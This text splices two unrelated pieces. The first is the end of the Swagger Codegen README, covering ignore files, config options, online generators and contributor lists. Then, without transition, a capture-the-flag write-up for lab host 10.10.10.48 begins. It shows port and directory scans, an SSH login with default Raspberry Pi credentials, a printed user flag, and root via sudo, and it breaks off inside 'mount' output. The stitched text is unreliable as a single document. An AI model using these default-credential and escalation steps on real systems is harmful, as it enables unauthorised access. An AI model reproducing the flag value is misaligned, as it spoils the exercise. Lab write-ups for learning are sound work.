java -Dapis -DapiTests=false {opts}
# generate only apis (modelTests option is ignored)
java -Dapis -DmodelTests=false {opts}
```
When using selective generation, _only_ the templates needed for the specific generation will be used.
### Ignore file format
Swagger codegen supports a `.swagger-codegen-ignore` file, similar to `.gitignore` or `.dockerignore` you're probably already familiar with.
The ignore file allows for better control over overwriting existing files than the `--skip-overwrite` flag. With the ignore file, you can specify individual files or directories can be ignored. This can be useful, for example if you only want a subset of the generated code.
Examples:
```sh
# Swagger Codegen Ignore
# Lines beginning with a # are comments
# This should match build.sh located anywhere.
build.sh
# Matches build.sh in the root
/build.sh
# Exclude all recursively
docs/**
# Explicitly allow files excluded by other rules
!docs/UserApi.md
# Recursively exclude directories named Api
# You can't negate files below this directory.
src/**/Api/
# When this file is nested under /Api (excluded above),
# this rule is ignored because parent directory is excluded by previous rule.
!src/**/PetApiTests.cs
# Exclude a single, nested file explicitly
src/IO.Swagger.Test/Model/AnimalFarmTests.cs
```
The `.swagger-codegen-ignore` file must exist in the root of the output directory.
### Customizing the generator
There are different aspects of customizing the code generator beyond just creating or modifying templates. Each language has a supporting configuration file to handle different type mappings, etc:
```sh
$ ls -1 modules/swagger-codegen/src/main/java/io/swagger/codegen/languages/
AbstractJavaJAXRSServerCodegen.java
AbstractTypeScriptClientCodegen.java
... (results omitted)
TypeScriptAngularClientCodegen.java
TypeScriptNodeClientCodegen.java
```
Each of these files creates reasonable defaults so you can get running quickly. But if you want to configure package names, prefixes, model folders, etc. you can use a json config file to pass the values.
```sh
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i http://petstore.swagger.io/v2/swagger.json \
-l java \
-o samples/client/petstore/java \
-c path/to/config.json
```
and `config.json` contains the following as an example:
```json
{
"apiPackage" : "petstore"
}
```
Supported config options can be different per language. Running `config-help -l {lang}` will show available options.
**These options are applied via configuration file (e.g. config.json) or by passing them with `-D{optionName}={optionValue}`**. (If `-D{optionName}` does not work, please open a [ticket](https://github.com/swagger-api/swagger-codegen/issues/new) and we'll look into it)
```sh
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar config-help -l java
```
Output
```
CONFIG OPTIONS
modelPackage
package for generated models
apiPackage
package for generated api classes
...... (results omitted)
library
library template (sub-template) to use:
jersey1 - HTTP client: Jersey client 1.18. JSON processing: Jackson 2.4.2
jersey2 - HTTP client: Jersey client 2.6
feign - HTTP client: Netflix Feign 8.1.1. JSON processing: Jackson 2.6.3
okhttp-gson (default) - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1
retrofit - HTTP client: OkHttp 2.4.0. JSON processing: Gson 2.3.1 (Retrofit 1.9.0)
retrofit2 - HTTP client: OkHttp 2.5.0. JSON processing: Gson 2.4 (Retrofit 2.0.0-beta2)
```
Your config file for Java can look like
```json
{
"groupId":"com.my.company",
"artifactId":"MyClient",
"artifactVersion":"1.2.0",
"library":"feign"
}
```
For all the unspecified options default values will be used.
Another way to override default options is to extend the config class for the specific language.
To change, for example, the prefix for the Objective-C generated files, simply subclass the ObjcClientCodegen.java:
```java
package com.mycompany.swagger.codegen;
import io.swagger.codegen.languages.*;
public class MyObjcCodegen extends ObjcClientCodegen {
static {
PREFIX = "HELO";
}
}
```
and specify the `classname` when running the generator:
```
-l com.mycompany.swagger.codegen.MyObjcCodegen
```
Your subclass will now be loaded and overrides the `PREFIX` value in the superclass.
### Bringing your own models
Sometimes you don't want a model generated. In this case, you can simply specify an import mapping to tell
the codegen what _not_ to create. When doing this, every location that references a specific model will
refer back to your classes. Note, this may not apply to all languages...
To specify an import mapping, use the `--import-mappings` argument and specify the model-to-import logic as such:
```
--import-mappings Pet=my.models.MyPet
```
Or for multiple mappings:
```
--import-mappings Pet=my.models.MyPet,Order=my.models.MyOrder
```
or
```
--import-mappings Pet=my.models.MyPet --import-mappings Order=my.models.MyOrder
```
### Validating your OpenAPI Spec
You have options. The easiest is to use our [online validator](https://github.com/swagger-api/validator-badge) which not only will let you validate your spec, but with the debug flag, you can see what's wrong with your spec. For example:
http://online.swagger.io/validator/debug?url=http://petstore.swagger.io/v2/swagger.json
### Generating dynamic html api documentation
To do so, just use the `-l dynamic-html` flag when reading a spec file. This creates HTML documentation that is available as a single-page application with AJAX. To view the documentation:
```sh
cd samples/dynamic-html/
npm install
node .
```
Which launches a node.js server so the AJAX calls have a place to go.
### Generating static html api documentation
To do so, just use the `-l html` flag when reading a spec file. This creates a single, simple HTML file with embedded css so you can ship it as an email attachment, or load it from your filesystem:
```sh
cd samples/html/
open index.html
```
### To build a server stub
Please refer to https://github.com/swagger-api/swagger-codegen/wiki/Server-stub-generator-HOWTO for more information.
### To build the codegen library
This will create the swagger-codegen library from source.
```sh
mvn package
```
Note! The templates are included in the library generated. If you want to modify the templates, you'll need to either repackage the library OR specify a path to your scripts
## Workflow integration
You can use the [swagger-codegen-maven-plugin](modules/swagger-codegen-maven-plugin/README.md) for integrating with your workflow, and generating any codegen target.
## GitHub Integration
To push the auto-generated SDK to GitHub, we provide `git_push.sh` to streamline the process. For example:
1) Create a new repository in GitHub (Ref: https://help.github.com/articles/creating-a-new-repository/)
2) Generate the SDK
```sh
java -jar modules/swagger-codegen-cli/target/swagger-codegen-cli.jar generate \
-i modules/swagger-codegen/src/test/resources/2_0/petstore.json -l perl \
--git-user-id "wing328" \
--git-repo-id "petstore-perl" \
--release-note "Github integration demo" \
-o /var/tmp/perl/petstore
```
3) Push the SDK to GitHub
```sh
cd /var/tmp/perl/petstore
/bin/sh ./git_push.sh
```
## Online generators
One can also generate API client or server using the online generators (https://generator.swagger.io)
For example, to generate Ruby API client, simply send the following HTTP request using curl:
```sh
curl -X POST -H "content-type:application/json" -d '{"swaggerUrl":"http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/ruby
```
Then you will receieve a JSON response with the URL to download the zipped code.
To customize the SDK, you can `POST` to `https://generator.swagger.io/gen/clients/{language}` with the following HTTP body:
```json
{
"options": {},
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}
```
in which the `options` for a language can be obtained by submitting a `GET` request to `https://generator.swagger.io/api/gen/clients/{language}`:
For example, `curl https://generator.swagger.io/api/gen/clients/python` returns
```json
{
"packageName":{
"opt":"packageName",
"description":"python package name (convention: snake_case).",
"type":"string",
"default":"swagger_client"
},
"packageVersion":{
"opt":"packageVersion",
"description":"python package version.",
"type":"string",
"default":"1.0.0"
},
"sortParamsByRequiredFlag":{
"opt":"sortParamsByRequiredFlag",
"description":"Sort method arguments to place required parameters before optional parameters.",
"type":"boolean",
"default":"true"
}
}
```
To set package name to `pet_store`, the HTTP body of the request is as follows:
```json
{
"options": {
"packageName": "pet_store"
},
"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"
}
```
and here is the curl command:
```sh
curl -H "Content-type: application/json" -X POST -d '{"options": {"packageName": "pet_store"},"swaggerUrl": "http://petstore.swagger.io/v2/swagger.json"}' https://generator.swagger.io/api/gen/clients/python
```
Instead of using `swaggerUrl` with an URL to the OpenAPI/Swagger spec, one can include the spec in the JSON payload with `spec`, e.g.
```json
{
"options": {},
"spec": {
"swagger": "2.0",
"info": {
"version": "1.0.0",
"title": "Test API"
},
...
}
}
```
Guidelines for Contribution
---------------------------
Please refer to this [page](https://github.com/swagger-api/swagger-codegen/blob/master/CONTRIBUTING.md)
Companies/Projects using Swagger Codegen
----------------------------------------
Here are some companies/projects using Swagger Codegen in production. To add your company/project to the list, please visit [README.md](https://github.com/swagger-api/swagger-codegen/blob/master/README.md) and click on the icon to edit the page.
- [Activehours](https://www.activehours.com/)
- [Acunetix](https://www.acunetix.com/)
- [Atlassian](https://www.atlassian.com/)
- [Autodesk](http://www.autodesk.com/)
- [Avenida Compras S.A.](https://www.avenida.com.ar)
- [AYLIEN](http://aylien.com/)
- [Balance Internet](https://www.balanceinternet.com.au/)
- [beemo](http://www.beemo.eu)
- [bitly](https://bitly.com)
- [BeezUP](http://www.beezup.com)
- [Box](https://box.com)
- [Bufferfly Network](https://www.butterflynetinc.com/)
- [Cachet Financial](http://www.cachetfinancial.com/)
- [carpolo](http://www.carpolo.co/)
- [CloudBoost](https://www.CloudBoost.io/)
- [Cisco](http://www.cisco.com/)
- [Conplement](http://www.conplement.de/)
- [Cummins](http://www.cummins.com/)
- [Cupix](http://www.cupix.com)
- [DBBest Technologies](https://www.dbbest.com)
- [DecentFoX](http://decentfox.com/)
- [DocRaptor](https://docraptor.com)
- [DocuSign](https://www.docusign.com)
- [Ergon](http://www.ergon.ch/)
- [Dell EMC](https://www.emc.com/)
- [eureka](http://eure.jp/)
- [everystory.us](http://everystory.us)
- [Expected Behavior](http://www.expectedbehavior.com/)
- [Fastly](https://www.fastly.com/)
- [Flat](https://flat.io)
- [Finder](http://en.finder.pl/)
- [FH Münster - University of Applied Sciences](http://www.fh-muenster.de)
- [Fotition](https://www.fotition.com/)
- [Gear Zero Network](https://www.gearzero.ca)
- [General Electric](https://www.ge.com/)
- [Germin8](http://www.germin8.com)
- [GigaSpaces](http://www.gigaspaces.com)
- [goTransverse](http://www.gotransverse.com/api)
- [GraphHopper](https://graphhopper.com/)
- [Gravitate Solutions](http://gravitatesolutions.com/)
- [HashData](http://www.hashdata.cn/)
- [Hewlett Packard Enterprise](https://hpe.com)
- [High Technologies Center](http://htc-cs.com)
- [IBM](https://www.ibm.com)
- [IMS Health](http://www.imshealth.com/en/solution-areas/technology-and-applications)
- [Individual Standard IVS](http://www.individual-standard.com)
- [Intent HQ](http://www.intenthq.com)
- [Interactive Intelligence](http://developer.mypurecloud.com/)
- [Kabuku](http://www.kabuku.co.jp/en)
- [Kurio](https://kurio.co.id)
- [Kuroi](http://kuroiwebdesign.com/)
- [Kuary](https://kuary.com/)
- [Kubernetes](https://kubernetes.io/)
- [LANDR Audio](https://www.landr.com/)
- [Lascaux](http://www.lascaux.it/)
- [Leanix](http://www.leanix.net/)
- [Leica Geosystems AG](http://leica-geosystems.com)
- [LiveAgent](https://www.ladesk.com/)
- [LXL Tech](http://lxltech.com)
- [Lyft](https://www.lyft.com/developers)
- [MailMojo](https://mailmojo.no/)
- [Mindera](http://mindera.com/)
- [Mporium](http://mporium.com/)
- [Neverfail](https://neverfail.com/)
- [nViso](http://www.nviso.ch/)
- [Okiok](https://www.okiok.com)
- [Onedata](http://onedata.org)
- [OrderCloud.io](http://ordercloud.io)
- [OSDN](https://osdn.jp)
- [PagerDuty](https://www.pagerduty.com)
- [PagerTree](https://pagertree.com)
- [Pepipost](https://www.pepipost.com)
- [Plexxi](http://www.plexxi.com)
- [Pixoneye](http://www.pixoneye.com/)
- [PostAffiliatePro](https://www.postaffiliatepro.com/)
- [PracticeBird](https://www.practicebird.com/)
- [Prill Tecnologia](http://www.prill.com.br)
- [QAdept](http://qadept.com/)
- [QuantiModo](https://quantimo.do/)
- [QuickBlox](https://quickblox.com/)
- [Rapid7](https://rapid7.com/)
- [Red Hat](https://www.redhat.com/)
- [Reload! A/S](https://reload.dk/)
- [REstore](https://www.restore.eu)
- [Revault Sàrl](http://revault.ch)
- [Riffyn](https://riffyn.com)
- [Royal Bank of Canada (RBC)](http://www.rbc.com/canada.html)
- [Saritasa](https://www.saritasa.com/)
- [SAS](https://www.sas.com)
- [SCOOP Software GmbH](http://www.scoop-software.de)
- [Shine Solutions](https://shinesolutions.com/)
- [Simpfony](https://www.simpfony.com/)
- [Skurt](http://www.skurt.com)
- [Slamby](https://www.slamby.com/)
- [SmartRecruiters](https://www.smartrecruiters.com/)
- [snapCX](https://snapcx.io)
- [SPINEN](http://www.spinen.com)
- [Sponsoo](https://www.sponsoo.de)
- [SRC](https://www.src.si/)
- [Stardog Ventures](https://www.stardog.io)
- [Stingray](http://www.stingray.com)
- [StyleRecipe](http://stylerecipe.co.jp)
- [Svenska Spel AB](https://www.svenskaspel.se/)
- [Switch Database](https://www.switchdatabase.com/)
- [TaskData](http://www.taskdata.com/)
- [ThoughtWorks](https://www.thoughtworks.com)
- [Trexle](https://trexle.com/)
- [Upwork](http://upwork.com/)
- [uShip](https://www.uship.com/)
- [VMware](https://vmware.com/)
- [Viavi Solutions Inc.](https://www.viavisolutions.com)
- [W.UP](http://wup.hu/?siteLang=en)
- [Wealthfront](https://www.wealthfront.com/)
- [Webever GmbH](https://www.webever.de/)
- [WEXO A/S](https://www.wexo.dk/)
- [XSky](http://www.xsky.com/)
- [Yelp](http://www.yelp.com/)
- [Zalando](https://tech.zalando.com)
- [ZEEF.com](https://zeef.com/)
- [zooplus](https://www.zooplus.com/)
Presentations/Videos/Tutorials/Books
----------------------------------------
- 2015/07/28 - [Enriching RESTful Services with Swagger](https://blog.philipphauer.de/enriching-restful-services-swagger/) by [Philipp Hauer](https://blog.philipphauer.de/)
- 2015/11/11 - [Generate client stubs & document your REST-API using Swagger & Spring](https://www.youtube.com/watch?v=43GhBbP--oI) by [Johannes Fiala](https://github.com/jfiala) @ Devoxx Belgium 2015
- 2015/12/03 - [こんなに簡単! Swagger Codegenのカスタマイズ](http://qiita.com/Quramy/items/c583f3213f0b77ff1bac) by [Quramy](http://qiita.com/Quramy)
- 2016/01/12 - [Generate client side code using Swagger Codegen](http://rnavagamuwa.com/open-source/generate-client-side-code-using-swagger-codegen/) by [RNAVAGAMUWA](http://rnavagamuwa.com/author/admin/)
- 2016/01/15 - [How to end manual REST-API client coding](https://www.youtube.com/watch?v=RzZRdqZp6Oo) by [Johannes Fiala](https://github.com/jfiala) @ dotJS 2015
- 2016/04/27 - [Automated REST API Development](https://yos.io/2016/04/27/automated-api-development/) by [Yos Riady](https://www.linkedin.com/in/yosriady)
- 2016/05/29 - [Generating Java Spring-MVC code from Swagger Spec](https://www.clianz.com/2016/05/29/java-mvc-swagger-gen/) by [@icha024](https://github.com/icha024)
- 2016/11/05 - [How to generate a REST Application](https://www.youtube.com/watch?v=iyC9BWMe75Q) by [Johannes Fiala](https://github.com/jfiala) @ DevFest Vienna 2016
- 2016/11/10 - [Building an AEM API clients ecosystem](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/) by Cliffano Subagio, Michael Diender, Stephen Shim from Shine Solutions @ [Adobe Marketing Cloud Community Expo (AMCCE)](https://www.meetup.com/Melbourne-AEM-CQ-Meetup/events/233363101/)
- 2016/11/18 - [How to generate a REST CXF3 application from Swagger-Contract](https://www.slideshare.net/johannes_fiala/how-to-generate-a-rest-cxf3-application-from-swagger-apacheconeu-2016) by [Johannes Fiala](https://github.com/jfiala) @ ApacheConEU 2016
- 2016/11/25 - [Swagger Codegen for Swift3 and NodeJS](https://normand1.github.io/blog/swift/swagger/codegen/2016/11/25/Swagger-Codegen-for-Swift3-and-NodeJS.html) by [David Norman](https://github.com/normand1)
- 2017/03/03 - [Swagger Codegen の使い方の簡単な説明です](https://speakerdeck.com/wagyu298/swagger-codegen) by [wagyu298](https://github.com/wagyu298)
- 2017/03/24 - [Using Open API Specification To Put Lyft SDK Support in the Fast Lane](https://medium.com/lyft-developer-platform/using-open-api-specification-to-put-lyft-sdk-support-in-the-fast-lane-7b623218e4ee) by [Val Polouchkine](https://github.com/vpolouchkine)
- 2017/04/27 - [Swagger Codegen のPHP実装があまりにアレだったので、ライブラリ自作して公開してみた](http://qiita.com/imunew/items/2e9c472e0097e329f2cd) by [imunew](http://qiita.com/imunew)
- 2017/05/17 - [Diseño de APIs con OpenAPI](https://www.slideshare.net/pjmolina/diseo-de-apis-con-openapi) by [Pedro J. Molina](https://github.com/pjmolina) @ [JSDayES 2017](http://2017.jsday.es/)
- 2017/05/22 - [Presentation of the Vert.x-Swagger project](http://vertx.io/blog/presentation-of-the-vert-x-swagger-project/) by [@phiz71](http://github.com/phiz71)
- 2017/06/21 - [Swagger Presentation - Warsaw Ruby Users Group](https://www.youtube.com/watch?v=uCnnDMFQB8U) by [@rafalpetryka](http://github.com/rafalpetryka)
# Swagger Codegen Core Team
Swagger Codegen core team members are contributors who have been making significant contributions (review issues, fix bugs, make enhancements, etc) to the project on a regular basis.
## API Clients
| Languages | Core Team (join date) |
|:-------------|:-------------|
| ActionScript | |
| C++ | |
| C# | @jimschubert (2016/05/01) |
| Clojure | @xhh (2016/05/01) |
| Dart | |
| Groovy | |
| Go | @guohuang (2016/05/01) @neilotoole (2016/05/01) |
| Java | @cbornet (2016/05/01) @xhh (2016/05/01) @epaul (2016/06/04) |
| Java (Spring Cloud) | @cbornet (2016/07/19) |
| Kotlin | @jimschubert (2016/05/01) |
| NodeJS/Javascript | @xhh (2016/05/01) |
| ObjC | @mateuszmackowiak (2016/05/09) |
| Perl | @wing328 (2016/05/01) |
| PHP | @arnested (2016/05/01) |
| Python | @scottrw93 (2016/05/01) |
| Ruby | @wing328 (2016/05/01) @zlx (2016/05/22) |
| Scala | |
| Swift | @jaz-ah (2016/05/01) @Edubits (2016/05/01) |
| TypeScript (Node) | @Vrolijkx (2016/05/01) |
| TypeScript (Angular1) | @Vrolijkx (2016/05/01) |
| TypeScript (Angular2) | @Vrolijkx (2016/05/01) |
| TypeScript (Fetch) | |
## Server Stubs
| Languages | Core Team (date joined) |
|:------------- |:-------------|
| C# ASP.NET5 | @jimschubert (2016/05/01) |
| Go Server | @guohuang (2016/06/13) |
| Haskell Servant | |
| Java Spring Boot | @cbornet (2016/07/19) |
| Java Spring MVC | @kolyjjj (2016/05/01) @cbornet (2016/07/19) |
| Java JAX-RS | |
| Java Play Framework | |
| NancyFX | |
| NodeJS | @kolyjjj (2016/05/01) |
| PHP Lumen | @abcsum (2016/05/01) |
| PHP Silex | |
| PHP Slim | |
| Python Flask | |
| Ruby Sinatra | @wing328 (2016/05/01) | |
| Scala Scalatra | | |
| Scala Finch | @jimschubert (2017/01/28) |
## Template Creator
Here is a list of template creators:
* API Clients:
* Akka-Scala: @cchafer
* Apex: @asnelling
* Bash: @bkryza
* C++ REST: @Danielku15
* C# (.NET 2.0): @who
* C# (.NET Standard 1.3 ): @Gronsak
* C# (.NET 4.5 refactored): @jim
* Clojure: @xhh
* Dart: @yissachar
* Elixir: @niku
* Eiffel: @jvelilla
* Groovy: @victorgit
* Go: @wing328
* Go (rewritten in 2.3.0): @antihax
* Java (Feign): @davidkiss
* Java (Retrofit): @0legg
* Java (Retrofi2): @emilianobonassi
* Java (Jersey2): @xhh
* Java (okhttp-gson): @xhh
* Java (RestTemplate): @nbruno
* Java (RESTEasy): @gayathrigs
* Javascript/NodeJS: @jfiala
* Javascript (Closure-annotated Angular) @achew22
* JMeter @davidkiss
* Kotlin @jimschubert
* Perl: @wing328
* PHP (Guzzle): @baartosz
* PowerShell: @beatcracker
* Swift: @tkqubo
* Swift 3: @hexelon
* Swift 4: @ehyche
* TypeScript (Node): @mhardorf
* TypeScript (Angular1): @mhardorf
* TypeScript (Fetch): @leonyu
* TypeScript (Angular2): @roni-frantchi
* TypeScript (jQuery): @bherila
* Server Stubs
* C# ASP.NET5: @jimschubert
* C# NancyFX: @mstefaniuk
* C++ Pistache: @sebymiano
* C++ Restbed: @stkrwork
* Erlang Server: @galaxie
* Go Server: @guohuang
* Haskell Servant: @algas
* Java MSF4J: @sanjeewa-malalgoda
* Java Spring Boot: @diyfr
* Java Undertow: @stevehu
* Java Play Framework: @JFCote
* JAX-RS RestEasy: @chameleon82
* JAX-RS CXF: @hiveship
* JAX-RS CXF (CDI): @nickcmaynard
* JAX-RS RestEasy (JBoss EAP): @jfiala
* PHP Lumen: @abcsum
* PHP Slim: @jfastnacht
* PHP Symfony: @ksm2
* PHP Zend Expressive (with Path Handler): @Articus
* Ruby on Rails 5: @zlx
* Scala Finch: @jimschubert
* Documentation
* HTML Doc 2: @jhitchcock
* Confluence Wiki: @jhitchcock
* Configuration
* Apache2: @stkrwork
## How to join the core team
Here are the requirements to become a core team member:
- rank within top 50 in https://github.com/swagger-api/swagger-codegen/graphs/contributors
- to contribute, here are some good [starting points](https://github.com/swagger-api/swagger-codegen/issues?q=is%3Aopen+is%3Aissue+label%3A%22Need+community+contribution%22)
- regular contributions to the project
- about 3 hours per week
- for contribution, it can be addressing issues, reviewing PRs submitted by others, submitting PR to fix bugs or make enhancements, etc
To join the core team, please reach out to wing328hk@gmail.com (@wing328) for more information.
To become a Template Creator, simply submit a PR for new API client (e.g. Rust, Elixir) or server stub (e.g. Ruby Grape) generator.
# Swagger Codegen Evangelist
Swagger Codegen Evangelist shoulders one or more of the following responsibilities:
- publishes articles on the benefit of Swagger Codegen
- organizes local Meetups
- presents the benefits of Swagger Codegen in local Meetups or conferences
- actively answers questions from others in [Github](https://github.com/swagger-api/swagger-codegen/issues), [StackOverflow](stackoverflow.com/search?q=%5Bswagger%5D)
- submits PRs to improve Swagger Codegen
- reviews PRs submitted by the others
- ranks within top 100 in the [contributor list](https://github.com/swagger-api/swagger-codegen/graphs/contributors)
If you want to be a Swagger Codegen Evangelist, please kindly apply by sending an email to wing328hk@gmail.com (@wing328)
### List of Swagger Codegen Evangelists
- Cliffano Subagio (@cliffano from Australia joined on Dec 9, 2016)
- [Building An AEM API Clients Ecosystem](http://www.slideshare.net/cliffano/building-an-aem-api-clients-ecosystem)
- [Adobe Marketing Cloud Community Expo](http://blog.cliffano.com/2016/11/10/adobe-marketing-cloud-community-expo/)
# License information on Generated Code
The Swagger Codegen project is intended as a benefit for users of the Swagger / Open API Specification. The project itself has the [License](#license) as specified. In addition, please understand the following points:
* The templates included with this project are subject to the [License](#license).
* Generated code is intentionally _not_ subject to the parent project license
When code is generated from this project, it shall be considered **AS IS** and owned by the user of the software. There are no warranties--expressed or implied--for generated code. You can do what you wish with it, and once generated, the code is your responsibility and subject to the licensing terms that you deem appropriate.
License
-------
Copyright 2017 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at [apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
---
<img src="http://swagger.io/wp-content/uploads/2016/02/logo.jpg"/>
|
### IP
`10.10.10.48`
# Recon
### nmap
`nmap -sC -sV 10.10.10.48 -oN init.nmap`
```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-27 21:38 EDT
Nmap scan report for 10.10.10.48
Host is up (0.050s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.04 seconds
```
* I wasn't able to access port 80, so I did a more comprehensive scan:
`nmap -sC -sV 10.10.10.48 --min-rate 10000 -p-`
```
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-27 21:41 EDT
Warning: 10.10.10.48 giving up on port because retransmission cap hit (10).
Verbosity Increased to 1.
Completed Service scan at 21:41, 11.17s elapsed (6 services on 1 host)
NSE: Script scanning 10.10.10.48.
Initiating NSE at 21:41
Completed NSE at 21:42, 8.20s elapsed
Initiating NSE at 21:42
Completed NSE at 21:42, 0.22s elapsed
Initiating NSE at 21:42
Completed NSE at 21:42, 0.00s elapsed
Nmap scan report for 10.10.10.48
Host is up (0.052s latency).
Not shown: 63659 closed ports, 1870 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
| 1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
| 2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
| 256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_ 256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open domain dnsmasq 2.76
| dns-nsid:
|_ bind.version: dnsmasq-2.76
80/tcp open http lighttpd 1.4.35
| http-methods:
|_ Supported Methods: OPTIONS GET HEAD POST
|_http-server-header: lighttpd/1.4.35
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
1657/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open http Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-favicon: Plex
|_http-title: Unauthorized
32469/tcp open upnp Platinum UPnP 1.0.5.13 (UPnP/1.0 DLNADOC/1.50)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 21:42
Completed NSE at 21:42, 0.00s elapsed
Initiating NSE at 21:42
Completed NSE at 21:42, 0.00s elapsed
Initiating NSE at 21:42
Completed NSE at 21:42, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.06 seconds
Raw packets sent: 233946 (10.294MB) | Rcvd: 63990 (2.560MB)
```
* Port `32400` gives a website
* I looking at some vulnerabilities here, but nothing popped up.
* Instead, lets look back at port 80
### gobuster
* Since there is nothing initially for port 80, lets scan to see if anything else is there
`gobuster dir -u http://10.10.10.48/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt`
```
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.48/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/03/27 22:25:43 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 0] [--> http://10.10.10.48/admin/]
/versions (Status: 200) [Size: 13]
===============================================================
2021/03/27 22:45:00 Finished
===============================================================
```
* We can see an `/admin` page, which takes us to a pi.hole login
# SSH
* Based on the pi.hole, we can guess that the device running on ssh is a raspberry pi
* Using default credentials of `pi:raspberry` works
* We can log in with `ssh pi@10.10.10.48`
* `cat /home/pi/Desktop/user.txt` gives us the user flag: `ff837707441b257a20e32199d7c8838d`
# Privesc
* `sudo -l` shows us that we can run all commands as root.
* `sudo su` gives us root
# Forensics
* Trying to `cat /root/root.txt` doesn't give us the root flag, but rather the following:
```
I lost my original root.txt! I think I may have a backup on my USB stick...
```
* We can look for the usb stick by just typing `mount`, which gives the following output:
```bash
sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,relatime)
proc on /proc type proc (rw,nosuid,nodev,noexec,relatime)
tmpfs on /run type tmpfs (rw,nosuid,relatime,size=102396k,mode=755)
/dev/sda1 on /lib/live/mount/persistence/sda1 type iso9660 (ro,noatime)
/dev/loop0 on /lib/live/mount/rootfs/filesystem.squashfs type squashfs (ro,noatime)
tmpfs on /lib/live/mount/overlay type tmpfs (rw,relatime)
/dev/sda2 on /lib/live/mount/persistence/sda2 type ext4 (rw,noatime,data=ordered)
aufs on / type aufs (rw,noatime,si=a467153b,noxino)
devtmpfs on /dev type devtmpfs (rw,nosuid,size=10240k,nr_inodes=58955,mode=755)
securityfs on /sys/kernel/security type securityfs (rw,nosuid,nodev,noexec,relatime)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,gid=5,mode=620,ptmxmode=000)
tmpfs on /run/lock type tmpfs (rw,nosuid,nodev,noexec,relatime,size=5120k)
tmpfs on /sys/fs/cgroup type tmpfs (ro,nosuid,nodev,noexec,mode=755)
cgroup on /sys/fs/cgroup/systemd type cgroup (rw,nosuid,nodev,noexec,relatime,xattr,release_agent=/lib/systemd/systemd-cgroups-agent,name=systemd)
pstore on /sys/fs/pstore type pstore (rw,nosuid,nodev,noexec,relatime)
cgroup on /sys/fs/cgroup/cpuset type cgroup (rw,nosuid,nodev,noexec,relatime,cpuset)
cgroup on /sys/fs/cgroup/cpu,cpuacct type cgroup (rw,nosuid,nodev,noexec,relatime,cpu,cpuacct)
cgroup on /sys/fs/cgroup/devices type cgroup (rw,nosuid,nodev,noexec,relatime,devices)
cgroup on /sys/fs/cgroup/freezer type cgroup (rw,nosuid,nodev,noexec,relatime,freezer)
cgroup on /sys/fs/cgroup/net_cls,net_prio type cgroup (rw,nosuid,nodev,noexec,relatime,net_cls,net_prio)
cgroup on /sys/fs/cgroup/blkio type cgroup (rw,nosuid,nodev,noexec,relatime,blkio)
cgroup on /sys/fs/cgroup/perf_event type cgroup (rw,nosuid,nodev,noexec,relatime,perf_event)
systemd-1 on /proc/sys/fs/binfmt_misc type autofs (rw,relatime,fd=22,pgrp=1,timeout=300,minproto=5,maxproto=5,direct)
debugfs on /sys/kernel/debug type debugfs (rw,relatime)
